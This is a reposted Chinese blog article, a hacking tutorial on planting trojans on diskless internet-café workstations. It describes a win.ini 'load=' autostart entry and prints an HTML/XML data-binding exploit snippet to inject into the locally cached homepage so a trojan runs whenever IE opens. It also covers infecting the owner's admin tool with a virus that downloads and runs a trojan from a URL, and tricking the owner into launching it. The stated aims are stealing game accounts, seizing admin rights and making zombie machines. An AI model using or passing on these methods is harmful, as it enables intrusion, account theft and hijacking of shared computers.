無盤 破的就是你

源:[url]http://www.goto10000.com/BLOG[/url]

考慮到依冰兄是把木馬檔案複制到"WZ\All Users\Start Menu\Programs\啟動"中，讓它随系統啟動的，那麼我順着這個思路接着說讓木馬随系統啟動的方法。無盤工作站一般有如下幾個盤符：A：使用者共用存放檔案盤，使用者有完全控制權，打開資料總管就可以看到這個盤符。（如圖一）

計算機随使用者使用情況不同而不同，使用者有完全控制權，打開資料總管不可直接進入。G：系統啟動程式、系統程式、應用程式存放目錄，使用者權限為隻讀，打開資料總管不可看到。

使用dos指令 start g:\ 提示找不到該盤，就是用靈鸠劍客在2004年第2期裡介紹的方法也找不到該盤（注：上面提到的盤符随工作站不同而不同。）那麼怎樣才可以找到這個系統啟動程式、系統程式、應用程式的存放盤呢？很簡單在桌面上任意找一個檔案圖示，單擊右鍵→屬性→快捷方式→正常。（見圖二）

我這裡的位置是G:\xyy\Desktop。那怎麼才可能進入這個目錄呢？你不是說用了N中方法都進不去嗎？該你上場了哦，隻見20cn邁着矯健的步伐上場了，（如圖三）

資料總管，當然其他的木馬也可以啦，

這樣所有的盤符我們就一覽無疑了。在20cn檔案浏覽裡找到G盤的xyy目錄，它就是我們桌面快捷方式的存放目錄，這個目錄在系統重起時自動加載。在xyy\Start Menu\Programs\啟動中找到了快捷方式qq.ink，其實它指向的是防毒軟體qqav。（如圖四）

是網吧老闆為我們設定的，用來清除qq病毒，每次開機自動遠行。在桌面上也可以看到它（如圖五）

到這個qq.ink也就是說我們找對目錄了，但是把木馬放在這裡也太招人耳目了，于是我選擇在G:\xyy\WZ中的win.ini檔案裡寫入一個文本檔案的路徑，

[windows]

load=A:\2004.txt

run=

NullPort=None

關機重起，一個可愛的文本檔案自己跳了出來，呵呵成功了。接着我又把G:\xyy\WZ\win.ini改為原樣繼續測試，發現wz.stz目錄中win.ini檔案，隻有在使用者重建或者登出後，"load="後面的檔案才會在系統重起後自動遠行，這對一些喜歡盜傳奇号和其他遊戲号的朋友帶來了福音，因為他們最怕使用者重建或者登出了，因為重建後就連qq病毒都報帳了，就更不用說他們的盜号木馬了。在G盤中還有很多目錄中有win.ini、SYSTEM.ini和啟動，我沒有時間一一去試了，有興趣的朋友可以自己去試下，說不定有新的發現。

前面我是順着依冰兄的思路說了一段，下面說的木馬自啟動方法就不是讓它随系統啟動了，而是姜太公釣魚願者上鈎，讓使用者來幫我們運作木馬檔案。

第一種方法：借屍還魂

這天我在網吧上網，學習sql注入，忽然整個網吧掉線了。我暈，剛剛才猜到一個表名啊。于是我等了一會，又打開IE，想看看連上線沒有，好進入下一步的猜解，但是還是沒有連上，而IE的左下角卻顯示着"G:\xyy\web-\……"後面的字沒有看清楚，再看網頁中的圖檔都顯示出來了，檢視網頁原文發現圖檔都是相對路徑，而網頁上的那些欄目都是絕對路徑，難道說無盤系統設定首頁時是先讓IE打開本地的網頁再轉到另外一個網上的首頁位址，我靈機一動，馬上打開G:\xyy\web-\找到了一個名為index1.htm的檔案，（如圖六）

在裡面加入以下代碼：

<span datasrc="#hao#" datafld="exploit" dataformatas="html"></span>

<xml id="hao#">

<nothing>

<exploit>

<![CDATA[<object classid="clsid:11340012004-4414-478473" codebase="g:/ss.exe"></object>]]>

</exploit>

</nothing>

</xml>

請把g:/ss.exe 改為你木馬的路徑。這段代碼的好處是不需要activex支援，因為現在很多網吧都把它禁用了。這樣隻要有人打開IE，那麼我們的木馬g:/ss.exe就運作了，那麼怎樣找到這個網頁檔案的路徑呢？先告訴你一個笨辦法，那就是先把網線拔了，人為的制造一次掉線，哈哈！第二個方法當然是去系統資料庫

[HKEY_CURRENT_USER\software\microsoft\internet Explorer\main]下面去找啦。

第二種方法：毒上加毒

使用這種辦法，不但可以讓木馬跑起來，而且隻要略施小計還可以提升我們在網吧的權限，為什麼這麼說呢？跟我來，我首先說一下什麼叫做毒上加毒。先把我的寶貝史萊姆病毒生成器打開，史萊姆是一個可以感染Windows下的EXE檔案的病毒，與其它病毒的不同是它不會發作，不會對系統造成任何破壞。在主機上網時，它會自動從事先設定的URL下載下傳程式并運作，并且具有智能監測功能，可以保證下載下傳的程式始終在運作。

我看中的不僅是它的智能監測功能，還有當我們對我們的馬兒不滿意，想換個口味時隻要把URL下的木馬改掉就可以了，是不是比檔案捆綁強多了。

程式的設定也非常簡單，（如圖七）

在"URL設定"欄處填入你的木馬URL。這裡需要一個首頁空間，什麼你沒有，那麼趕快去[url]http://www.topcities.com[/url]申請一個吧！有150mb大小哦，你想放什麼都可以啦。接着在"感染設定"欄目中輸入想要被病毒感染的檔案路徑，我這裡是選擇的G:\sfMir16\私服添删工具.exe，這樣一個病毒加木馬毒上加毒的程式就打造完成了。

在無盤工作室上過網的朋友可能會問，這個"私服添删工具.exe"（如圖八）

在桌面上沒有快捷方式，而G盤又打不開。一般的使用者連看也看不到這個檔案，又怎麼可能去運作它呢？問得好，那麼我們反過來想一下，既然一般的使用者不可能運作它，那誰才有這個權限呢？當然是網吧老闆啦。這個時候我隻要跑到老闆那裡對他說："給我添加一個私服：218.15.21.145……"他就會熟練的打開N個檔案目錄後運作我們的染毒檔案——私服添删工具.exe，正當他等我贊揚他服務态度好的時候，我卻在一邊發出"星仔"般的奸笑，哈哈……

因為現在網吧主機已經感染了史萊姆病毒，病毒自動從事先設定的URL下載下傳了我們的木馬并運作了它。就這樣略施小計我們拿到了網吧的最高權限，捕獲了一隻長時間線上的殭屍電腦，給它裝個網絡盒子，給我們當免費首頁空間使喚再好不過了。想要讓網吧其它計算機感染史萊姆的話也很簡單，先連上網吧主機讓網吧斷開網絡，正在玩網絡遊戲的使用者就紛紛退出遊戲了，趁這個短暫的時間，馬上用相同的手法去感染如："***堂" 一類的的網絡遊戲，等老闆再次把網絡連上，隻要有人進了***堂，那我們的馬兒就悄悄的在背景遠行了。

本文轉自loveme2351CTO部落格，原文連結：http://blog.51cto.com/loveme23/8591 ，如需轉載請自行聯系原作者